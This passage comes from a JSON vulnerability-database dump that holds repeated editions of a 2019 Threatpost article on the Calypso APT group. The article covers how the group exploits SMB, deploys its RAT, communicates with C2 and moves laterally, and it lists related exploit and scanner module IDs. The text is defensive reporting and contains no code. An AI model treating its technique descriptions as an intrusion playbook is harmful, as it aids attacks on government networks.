is that this thread was supposed to \u2018wake up\u2019 every 54 seconds, just like the first one.\u201d\n\nIn some attacks, the backdoor has also fetched executables, including the FlyingDutchman malware, which includes functions such as screenshot capture, remote shell, and file system operations.\n\nAs for attribution, PT said that its forensics indicate that the discovered APT group is likely to be of Asian origin and is Chinese-speaking. The firm reached this conclusion because in some of the attacks, the hackers accidentally disclosed their real IP addresses, which belonged to Chinese providers.\n\n\u201cThe IP address belongs to China Telecom,\u201d according to a PT analysis [launched Thursday](<https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5>). \u201cWe believe the attackers could have been careless and set up the proxy server incorrectly, thus disclosing their real IP address. This is the first piece of evidence supporting the Asian origins of the group.\u201d\n\nFurther, the researchers noted that in one of the attacks the group used [PlugX malware](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>) \u2014 traditionally used by many Chinese APT groups. Calypso also used the Byeby trojan, which was involved in the China-linked [SongXY malware campaign](<https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/>) in 2017.\n\n\u201cThe group has several successful hacks to its credit, but still makes mistakes allowing us to guess its origins,\u201d PT concluded. \u201cAll data given here suggests that the group originates from Asia and uses malware not previously described by anyone\u2026We keep monitoring the activities of Calypso closely and expect the group will attack again.\u201d\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "published": "2019-10-31T19:55:02", "modified": "2019-10-31T19:55:02", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://threatpost.com/calypso-apt-target-governments/149773/", "reporter": "Tara Seals", "references": ["https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010", "https://threatpost.com/fin6-target-ecommerce/147847/", "https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/", "https://threatpost.com/newsletter-sign/", "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5", "https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/", "https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART"], "cvelist": ["CVE-2017-0143", "CVE-2019-19781"], "lastseen": "2020-02-08T11:31:51", "history": [], "viewCount": 36, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-19781", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-111238", "SMNTC-96703"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54"]}, {"type": "freebsd", "idList": ["2BAB995F-36D4-11EA-9DAD-002590ACAE31"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155930", "PACKETSTORM:155947", "PACKETSTORM:155972", "PACKETSTORM:155904", "PACKETSTORM:155905"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250"]}, {"type": "nessus", "idList": ["CITRIX_NETSCALER_CTX267027.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/CITRIX_DIR_TRAVERSAL_RCE", "MSF:AUXILIARY/SCANNER/HTTP/CITRIX_DIR_TRAVERSAL"]}, {"type": "threatpost", "idList": ["THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:B8014941B9C018B67E06AFB27232454B", "THREATPOST:22158E449B59A11A581F1B8DDD309409", "THREATPOST:67CB5FDEB8A8DBBD7D08DBDAA2922ED2", "THREATPOST:CCF7941898F3992B3F68A48BA615C9D3", "THREATPOST:ABFFD895AAFB5901FF53611D96102FE1", "THREATPOST:8F656AF341505CA4322427DF6750F18D", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:233D38EB430EAD19986BB496F757AC76", "THREATPOST:6F4D076CD2B99D42353A5547FDBB288C"]}, {"type": "zdt", "idList": ["1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824"]}, {"type": "thn", "idList": ["THN:166AAAF7F04EF01C9E049500387BD1FD", "THN:6ED39786EE29904C7E93F7A0E35A39CB", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "talosblog", "idList": ["TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A", "TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6", "TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8"]}, {"type": "cert", "idList": ["VU:619785"]}, {"type": "exploitdb", "idList": ["EDB-ID:47930", "EDB-ID:47901"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}], "modified": "2020-02-08T11:31:51"}, "score": {"value": 6.2, "vector": "NONE", "modified": "2020-02-08T11:31:51"}}, "objectVersion": "1.4"}, "lastseen": "2020-02-08T11:31:51", "differentElements": ["cvelist"], "edition": 3}, {"bulletin": {"id": "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "hash": "144a81444c294a319259cd5721fdb200", "type": "threatpost", "bulletinFamily": "info", "title": "Calypso APT Emerges from the Shadows to Target Governments", "description": "A newly discovered APT group, dubbed Calypso after a custom malware RAT that it uses, has been targeting state institutions in six different countries since 2016.\n\nGovernment organizations in India (34 percent), Brazil and Kazakhstan (18 percent respectively), Russia and Thailand (12 percent respectively) and Turkey (6 percent) have all been successfully infiltrated at some point, according to analysts at Positive Technologies (PT), which first spotted the group in March.\n\nTo that point, the typical _modus operandi_ of the threat actors consists of infiltrating the network perimeter by exploiting a Windows SMB remote code-execution vulnerability ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)) or by using stolen credentials. Once inside the network, the group injects a backdoor RAT program \u2013 the Calypso web shell \u2013 that it uses to execute commands and upload utilities and malware (including well-known tools like [Mimikatz](<https://threatpost.com/fin6-target-ecommerce/147847/>), and the NSA hacking tools [EternalBlue and EternalRomance](<https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/>)), all in an effort to move laterally. The goal is to reach endpoints on a targeted organization\u2019s LAN and steal confidential data. The APT also uses a variety of legitimate administrative tools, which helps it stay under the radar, PT pointed out.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThese attacks succeeded largely because most of the utilities the group uses to move inside the network are widely used by the specialists everywhere for network administration,\u201d said Denis Kuvshinov, lead specialist in threat analysis at Positive Technologies, via email. \u201cThe group used publicly available utilities and exploit tools.\u201d\n\nThe Calypso RAT (it\u2019s unclear whether this is named after the Greek goddess from the Odyssey, the fruit drink, the island backbeat familiar from music world or something else altogether) is a custom affair. It contains a dropper for first-stage infection, which then extracts a further payloads in the form of a Windows batch script (BAT) for installation. The BAT file contains variables that can be invoked to have it save files, modify services and modify registry keys.\n\nPT analysis showed that the dropper next executes shellcode, which provides the interface for communicating with the command-and-control (C2) server and for downloading various modules. Once the C2 connection is made, the shellcode sends the C2 information about the infected computer, via TCP and SSL (such as computer name, current date, OS version, 32-bit vs. 64-bit OS and CPU, and IP addresses on network interfaces and their MAC addresses).\n\nCalypso RAT next can execute a total of 12 commands in the form of modules, each of which is self-contained and has two communication pipelines: One for transmitting data from the module to C2, and the other for receiving data from C2. Each module has a unique ID assigned by C2.\n\nAmong the commands are directions to launch three threads.\n\n\u201cOne is a heartbeat sending an empty packet to C2 every 54 seconds,\u201d explained PT, in the analysis. \u201cThe other processes and executes commands from C2. As for the third thread, we could not figure out its purpose, because the lines implementing its functionality were removed from the code. All we can tell is that this thread was supposed to \u2018wake up\u2019 every 54 seconds, just like the first one.\u201d\n\nIn some attacks, the backdoor has also fetched executables, including the FlyingDutchman malware, which includes functions such as screenshot capture, remote shell, and file system operations.\n\nAs for attribution, PT said that its forensics indicate that the discovered APT group is likely to be of Asian origin and is Chinese-speaking. The firm reached this conclusion because in some of the attacks, the hackers accidentally disclosed their real IP addresses, which belonged to Chinese providers.\n\n\u201cThe IP address belongs to China Telecom,\u201d according to a PT analysis [launched Thursday](<https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5>). \u201cWe believe the attackers could have been careless and set up the proxy server incorrectly, thus disclosing their real IP address. This is the first piece of evidence supporting the Asian origins of the group.\u201d\n\nFurther, the researchers noted that in one of the attacks the group used [PlugX malware](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>) \u2014 traditionally used by many Chinese APT groups. Calypso also used the Byeby trojan, which was involved in the China-linked [SongXY malware campaign](<https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/>) in 2017.\n\n\u201cThe group has several successful hacks to its credit, but still makes mistakes allowing us to guess its origins,\u201d PT concluded. \u201cAll data given here suggests that the group originates from Asia and uses malware not previously described by anyone\u2026We keep monitoring the activities of Calypso closely and expect the group will attack again.\u201d\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "published": "2019-10-31T19:55:02", "modified": "2019-10-31T19:55:02", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://threatpost.com/calypso-apt-target-governments/149773/", "reporter": "Tara Seals", "references": ["https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010", "https://threatpost.com/fin6-target-ecommerce/147847/", "https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/", "https://threatpost.com/newsletter-sign/", "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5", "https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/", "https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART"], "cvelist": ["CVE-2017-0143"], "lastseen": "2020-03-03T11:32:31", "history": [], "viewCount": 36, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2020-03-03T11:32:31"}, "score": {"value": 7.0, "vector": "NONE", "modified": "2020-03-03T11:32:31"}}, "objectVersion": "1.4"}, "lastseen": "2020-03-03T11:32:31", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "hash": "02cf3e03d7cf732490d89cdc2b4a219a", "type": "threatpost", "bulletinFamily": "info", "title": "Calypso APT Emerges from the Shadows to Target Governments", "description": "A newly discovered APT group, dubbed Calypso after a custom malware RAT that it uses, has been targeting state institutions in six different countries since 2016.\n\nGovernment organizations in India (34 percent), Brazil and Kazakhstan (18 percent respectively), Russia and Thailand (12 percent respectively) and Turkey (6 percent) have all been successfully infiltrated at some point, according to analysts at Positive Technologies (PT), which first spotted the group in March.\n\nTo that point, the typical _modus operandi_ of the threat actors consists of infiltrating the network perimeter by exploiting a Windows SMB remote code-execution vulnerability ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)) or by using stolen credentials. Once inside the network, the group injects a backdoor RAT program \u2013 the Calypso web shell \u2013 that it uses to execute commands and upload utilities and malware (including well-known tools like [Mimikatz](<https://threatpost.com/fin6-target-ecommerce/147847/>), and the NSA hacking tools [EternalBlue and EternalRomance](<https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/>)), all in an effort to move laterally. The goal is to reach endpoints on a targeted organization\u2019s LAN and steal confidential data. The APT also uses a variety of legitimate administrative tools, which helps it stay under the radar, PT pointed out.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThese attacks succeeded largely because most of the utilities the group uses to move inside the network are widely used by the specialists everywhere for network administration,\u201d said Denis Kuvshinov, lead specialist in threat analysis at Positive Technologies, via email. \u201cThe group used publicly available utilities and exploit tools.\u201d\n\nThe Calypso RAT (it\u2019s unclear whether this is named after the Greek goddess from the Odyssey, the fruit drink, the island backbeat familiar from music world or something else altogether) is a custom affair. It contains a dropper for first-stage infection, which then extracts a further payloads in the form of a Windows batch script (BAT) for installation. The BAT file contains variables that can be invoked to have it save files, modify services and modify registry keys.\n\nPT analysis showed that the dropper next executes shellcode, which provides the interface for communicating with the command-and-control (C2) server and for downloading various modules. Once the C2 connection is made, the shellcode sends the C2 information about the infected computer, via TCP and SSL (such as computer name, current date, OS version, 32-bit vs. 64-bit OS and CPU, and IP addresses on network interfaces and their MAC addresses).\n\nCalypso RAT next can execute a total of 12 commands in the form of modules, each of which is self-contained and has two communication pipelines: One for transmitting data from the module to C2, and the other for receiving data from C2. Each module has a unique ID assigned by C2.\n\nAmong the commands are directions to launch three threads.\n\n\u201cOne is a heartbeat sending an empty packet to C2 every 54 seconds,\u201d explained PT, in the analysis. \u201cThe other processes and executes commands from C2. As for the third thread, we could not figure out its purpose, because the lines implementing its functionality were removed from the code. All we can tell is that this thread was supposed to \u2018wake up\u2019 every 54 seconds, just like the first one.\u201d\n\nIn some attacks, the backdoor has also fetched executables, including the FlyingDutchman malware, which includes functions such as screenshot capture, remote shell, and file system operations.\n\nAs for attribution, PT said that its forensics indicate that the discovered APT group is likely to be of Asian origin and is Chinese-speaking. The firm reached this conclusion because in some of the attacks, the hackers accidentally disclosed their real IP addresses, which belonged to Chinese providers.\n\n\u201cThe IP address belongs to China Telecom,\u201d according to a PT analysis [launched Thursday](<https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5>). \u201cWe believe the attackers could have been careless and set up the proxy server incorrectly, thus disclosing their real IP address. This is the first piece of evidence supporting the Asian origins of the group.\u201d\n\nFurther, the researchers noted that in one of the attacks the group used [PlugX malware](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>) \u2014 traditionally used by many Chinese APT groups. Calypso also used the Byeby trojan, which was involved in the China-linked [SongXY malware campaign](<https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/>) in 2017.\n\n\u201cThe group has several successful hacks to its credit, but still makes mistakes allowing us to guess its origins,\u201d PT concluded. \u201cAll data given here suggests that the group originates from Asia and uses malware not previously described by anyone\u2026We keep monitoring the activities of Calypso closely and expect the group will attack again.\u201d\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "published": "2019-10-31T18:55:02", "modified": "2019-10-31T18:55:02", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://threatpost.com/calypso-apt-target-governments/149773/", "reporter": "Tara Seals", "references": ["https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010", "https://threatpost.com/fin6-target-ecommerce/147847/", "https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/", "https://threatpost.com/newsletter-sign/", "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5", "https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/", "https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART"], "cvelist": ["CVE-2017-0143"], "lastseen": "2020-03-08T11:43:54", "history": [], "viewCount": 36, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:13B65410050EE2481FFF6529E376C3DE", "THREATPOST:B991F2CF870C98BD40B817DE3CDF52A0", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2020-03-08T11:43:54", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2020-03-08T11:43:54", "rev": 2}}, "objectVersion": "1.4"}, "lastseen": "2020-03-08T11:43:54", "differentElements": ["cvelist"], "edition": 5}, {"bulletin": {"id": "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "hash": "c914fbd7f31ef2bedc9090b41c9c6c63", "type": "threatpost", "bulletinFamily": "info", "title": "Calypso APT Emerges from the Shadows to Target Governments", "description": "A newly discovered APT group, dubbed Calypso after a custom malware RAT that it uses, has been targeting state institutions in six different countries since 2016.\n\nGovernment organizations in India (34 percent), Brazil and Kazakhstan (18 percent respectively), Russia and Thailand (12 percent respectively) and Turkey (6 percent) have all been successfully infiltrated at some point, according to analysts at Positive Technologies (PT), which first spotted the group in March.\n\nTo that point, the typical _modus operandi_ of the threat actors consists of infiltrating the network perimeter by exploiting a Windows SMB remote code-execution vulnerability ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)) or by using stolen credentials. Once inside the network, the group injects a backdoor RAT program \u2013 the Calypso web shell \u2013 that it uses to execute commands and upload utilities and malware (including well-known tools like [Mimikatz](<https://threatpost.com/fin6-target-ecommerce/147847/>), and the NSA hacking tools [EternalBlue and EternalRomance](<https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/>)), all in an effort to move laterally. The goal is to reach endpoints on a targeted organization\u2019s LAN and steal confidential data. The APT also uses a variety of legitimate administrative tools, which helps it stay under the radar, PT pointed out.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThese attacks succeeded largely because most of the utilities the group uses to move inside the network are widely used by the specialists everywhere for network administration,\u201d said Denis Kuvshinov, lead specialist in threat analysis at Positive Technologies, via email. \u201cThe group used publicly available utilities and exploit tools.\u201d\n\nThe Calypso RAT (it\u2019s unclear whether this is named after the Greek goddess from the Odyssey, the fruit drink, the island backbeat familiar from music world or something else altogether) is a custom affair. It contains a dropper for first-stage infection, which then extracts a further payloads in the form of a Windows batch script (BAT) for installation. The BAT file contains variables that can be invoked to have it save files, modify services and modify registry keys.\n\nPT analysis showed that the dropper next executes shellcode, which provides the interface for communicating with the command-and-control (C2) server and for downloading various modules. Once the C2 connection is made, the shellcode sends the C2 information about the infected computer, via TCP and SSL (such as computer name, current date, OS version, 32-bit vs. 64-bit OS and CPU, and IP addresses on network interfaces and their MAC addresses).\n\nCalypso RAT next can execute a total of 12 commands in the form of modules, each of which is self-contained and has two communication pipelines: One for transmitting data from the module to C2, and the other for receiving data from C2. Each module has a unique ID assigned by C2.\n\nAmong the commands are directions to launch three threads.\n\n\u201cOne is a heartbeat sending an empty packet to C2 every 54 seconds,\u201d explained PT, in the analysis. \u201cThe other processes and executes commands from C2. As for the third thread, we could not figure out its purpose, because the lines implementing its functionality were removed from the code. All we can tell is that this thread was supposed to \u2018wake up\u2019 every 54 seconds, just like the first one.\u201d\n\nIn some attacks, the backdoor has also fetched executables, including the FlyingDutchman malware, which includes functions such as screenshot capture, remote shell, and file system operations.\n\nAs for attribution, PT said that its forensics indicate that the discovered APT group is likely to be of Asian origin and is Chinese-speaking. The firm reached this conclusion because in some of the attacks, the hackers accidentally disclosed their real IP addresses, which belonged to Chinese providers.\n\n\u201cThe IP address belongs to China Telecom,\u201d according to a PT analysis [launched Thursday](<https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5>). \u201cWe believe the attackers could have been careless and set up the proxy server incorrectly, thus disclosing their real IP address. This is the first piece of evidence supporting the Asian origins of the group.\u201d\n\nFurther, the researchers noted that in one of the attacks the group used [PlugX malware](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>) \u2014 traditionally used by many Chinese APT groups. Calypso also used the Byeby trojan, which was involved in the China-linked [SongXY malware campaign](<https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/>) in 2017.\n\n\u201cThe group has several successful hacks to its credit, but still makes mistakes allowing us to guess its origins,\u201d PT concluded. \u201cAll data given here suggests that the group originates from Asia and uses malware not previously described by anyone\u2026We keep monitoring the activities of Calypso closely and expect the group will attack again.\u201d\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "published": "2019-10-31T18:55:02", "modified": "2019-10-31T18:55:02", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://threatpost.com/calypso-apt-target-governments/149773/", "reporter": "Tara Seals", "references": ["https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010", "https://threatpost.com/fin6-target-ecommerce/147847/", "https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/", "https://threatpost.com/newsletter-sign/", "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5", "https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/", "https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART"], "cvelist": ["CVE-2017-0143", "CVE-2020-0688"], "lastseen": "2020-04-08T11:38:06", "history": [], "viewCount": 36, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": 